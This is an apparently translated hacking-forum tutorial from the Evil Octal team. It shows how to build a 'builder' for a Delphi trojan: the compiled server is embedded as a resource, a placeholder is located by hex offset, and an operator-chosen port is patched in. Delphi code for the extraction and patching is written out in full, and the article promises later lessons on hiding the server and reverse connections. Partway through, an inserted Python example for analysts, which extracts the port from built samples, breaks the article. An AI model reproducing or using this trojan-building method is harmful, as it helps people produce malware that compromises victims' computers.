Article God's Forbidden Zone
Information Source: Evil Octal Information Security team (www.eviloctal.com)
Delphi Trojan DIY Build Server
Here I will show how to generate a simple server. Why not talk about hiding the server side first? Because I think generating the server is a bit easier to understand, so it is a simple place to start. OK, let's go.
I am not very familiar with the other ways of generating a server that are described on the network, so I will explain my own method. (First of all, my method also comes from the network. If it is the same as someone else's, please do not say I infringe copyright, because I do not know who the original author is, and this article is not for commercial purposes. If a friend thinks that I have violated his copyright, please notify me immediately, and I will stop continuing this article at once, or credit him in the article. OK, I mainly study law, so I nag a little, but China has a saying: "say the ugly words up front." But few people actually do so.)
Begin:
First, we need to change the server we configured.
The server side itself will not have to customize the port. I will go one step at a time; do not ask why yet, I will explain later.
Open the server-side project. Is there a declaration like this in it?
var
  Form1: TForm1;
Yes, right here, we add a line: duankou: string = 'xxxxx';
This is a global variable. Then click on the Form1 window, which is your original window, and add an OnCreate event,
which is TForm1.FormCreate; it determines what to do when the window is created. Let's add this statement:
NMUDP1.LocalPort := StrToInt(duankou);
This means that the local port of NMUDP1 is the number held in duankou. (StrToInt converts a string to a number, as you know.)
The meaning is already very clear. Why is it duankou: string = 'xxxxx'; with xxxxx? Mostly because it is easy to search for, hey.
OK, our server is basically configured; now let's build the server.
Two. Step two. Actually, we're going to do two things:
1). Make the server into a resource
2). Find the location of the xxxxx in the server
OK, let's start by finding the location of the xxxxx in the server.
1. Open the compiled server in any hex editor. This is simple.
2. Search for xxxxx; this should find the location of the xxxxx. Mine is at 4e240. Yours may differ, so determine it yourself.
3. Open a base conversion tool (I also wrote one; I recommend searching Evil Octal for the articles published by Sobiny, the tool should be in there, hey, that's an ad) and convert the hexadecimal 4e240 to a decimal number. Mine is 320064. You must remember this number; we will use it later, and it is the most important thing!
All right, let's make the server into a resource.
1. In the folder where the server is generated, create a text document and write one line in it:
Fuwuduan RCDATA Server.exe
(identifier, resource type, file name)
Try not to make the identifier the same as the file name; it sometimes causes an error. OK, listen to me, thank you.
Rename this text document to FUWU.RC; this should need no explanation.
2. Create a batch file containing:
Path=e:\program Files\borland\delphi7\bin;
BRCC32 fuwu.rc
Path is your Delphi 7 bin directory. Then run this batch file; a fuwu.res will be generated in your server folder. This is the resource, hey, an important thing.
Copy it to the client's folder. OK, the preparation for this step is done ~ ~ ~
Three. The third step is to configure the client so that it can generate a server with a custom port
1. In the client's DPR, next to {$R *.res}, add a line {$R fuwu.res}. This means the server-side resource is automatically linked into the program when it is built.
2. Now we start actually generating a server, but this is the important part, so we will cover it in the fourth step.
Four. This is the most important step, the main one. I will do it first and then explain it in detail.
1. First we create a global constant
Add a line below the uses clause and above type:
const Offset_duankou = 320064; // This depends on your own value.
Here is the surrounding code, in case a novice cannot follow:
uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, StdCtrls, NMUDP;
const Offset_duankou = 320064;
type
  TForm1 = class(TForm)
    Button1: TButton; // see where I'm from.
2. Add two controls, an Edit and a Button. The Edit is for entering the port you want the generated server to use; the Button generates it.
3. Create a Button2 click event
In the Button2 click event we now declare
var
  Writebuff, Ziyuanzhizhen: PChar;
  Ziyuanweizhi: HRSRC;
  Ziyuandaxiao, BytesWritten: LongWord;
  Shujuchulijubing: THandle;
  Shenqingzhizhen: THandle;
  duankou: string;
Now we begin.
begin
  duankou := Trim(Edit4.Text); // text of the port Edit (Edit4)
  Ziyuanweizhi := FindResource(HInstance, 'fuwuduan', RT_RCDATA); // locate the resource 'fuwuduan' (the identifier I mentioned earlier)
  Ziyuandaxiao := SizeofResource(HInstance, Ziyuanweizhi); // resource size
  Shujuchulijubing := LoadResource(HInstance, Ziyuanweizhi); // resource data handle
  Ziyuanzhizhen := LockResource(Shujuchulijubing); // resource pointer
  Shenqingzhizhen := CreateFile(PChar('server.exe'), GENERIC_WRITE, FILE_SHARE_WRITE, nil, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
  WriteFile(Shenqingzhizhen, Ziyuanzhizhen^, Ziyuandaxiao, BytesWritten, nil); // write file
  Sleep(100);
  SetFilePointer(Shenqingzhizhen, Offset_duankou, nil, FILE_BEGIN); // reposition pointer
  Writebuff := PChar(duankou + StringOfChar(#0, 5 - Length(duankou))); // data to be written
  WriteFile(Shenqingzhizhen, Writebuff^, 5, BytesWritten, nil); // modify the file again
  CloseHandle(Shenqingzhizhen); // close the file handle
end;
I can't explain everything in detail, but if you're smart, you should be able to get the hang of it.
Note that in SetFilePointer, Offset_duankou is the address at which to start writing, which is of course the address we found earlier.
The 5 in Writebuff is the length of xxxxx, and so is the 5 in WriteFile. The 'server.exe' in Shenqingzhizhen can be changed to another name or a full path, or it could come from an Edit.
Then we build this client. After setting Edit4.Text (that is, the port to generate; for convenience I did no error handling here, such as showing an error prompt, but you should know the rules for choosing a port), click Button2. A server is then generated in the current folder, and its port will be the content of Edit4.Text.
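Because the builder described above overwrites a fixed 5-byte, NUL-padded field at a known offset, an analyst who holds the unpatched stub can recover the configured port from any built sample by locating the placeholder and checking that nothing else changed. The following is an added example, not code from the original article; the byte strings are constructed stand-ins for real files, and the function names are hypothetical.

```python
import re

PLACEHOLDER = b"xxxxx"         # marker string the article compiles into the stub
FIELD_LEN = len(PLACEHOLDER)   # the builder always overwrites exactly 5 bytes


def placeholder_offsets(stub):
    """File offsets at which the unpatched marker occurs in the stub."""
    return [m.start() for m in re.finditer(re.escape(PLACEHOLDER), stub)]


def read_port(sample, offset):
    """Decode the NUL-padded ASCII port field; None if it is not a valid port."""
    field = sample[offset:offset + FIELD_LEN]
    digits = field.split(b"\x00", 1)[0]
    if len(field) != FIELD_LEN or not digits.isdigit():
        return None
    port = int(digits)
    return port if 1 <= port <= 65535 else None


def extract_config(stub, sample):
    """Return (offset, port) if `sample` is `stub` with only the port field patched."""
    if len(stub) != len(sample):
        return None
    for off in placeholder_offsets(stub):
        end = off + FIELD_LEN
        # Everything outside the 5-byte field must be byte-identical to the stub.
        if stub[:off] == sample[:off] and stub[end:] == sample[end:]:
            port = read_port(sample, off)
            if port is not None:
                return off, port
    return None


# Constructed stand-ins for real files: a 128-byte "stub" with the marker at 0x40,
# and three "built" variants whose field holds a NUL-padded port string.
OFFSET = 0x40
STUB = b"MZ" + b"\x90" * (OFFSET - 2) + PLACEHOLDER + b"\x90" * 59
SAMPLE_8080 = STUB[:OFFSET] + b"8080\x00" + STUB[OFFSET + FIELD_LEN:]
SAMPLE_31337 = STUB[:OFFSET] + b"31337" + STUB[OFFSET + FIELD_LEN:]
SAMPLE_BAD = STUB[:OFFSET] + b"99999" + STUB[OFFSET + FIELD_LEN:]

if __name__ == "__main__":
    for name, data in [("8080", SAMPLE_8080), ("31337", SAMPLE_31337), ("bad", SAMPLE_BAD)]:
        print(name, extract_config(STUB, data))
```

Samples that are byte-identical except for five bytes at one offset are a useful clustering pivot, since they indicate output of the same builder.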
Let's test it.
In my XP + Delphi environment everything works normally. ~~~
Well, that's it for today. Next time I will talk about how to hide the server side, and if there is a chance, I will tell you about reverse connections and so on. You are welcome to look at the material on Evil Octal; I believe that soon you will become a master. (Why not say "also become a master"? Because I am still a novice. I am studying hard now to become a member of Evil Octal, but because my skills are not there yet, I keep studying hard and do not even dare to ask to join! Oh.) I believe that you will soon be able to become a member of Evil Octal; it is an honour.
Okay, see you next time.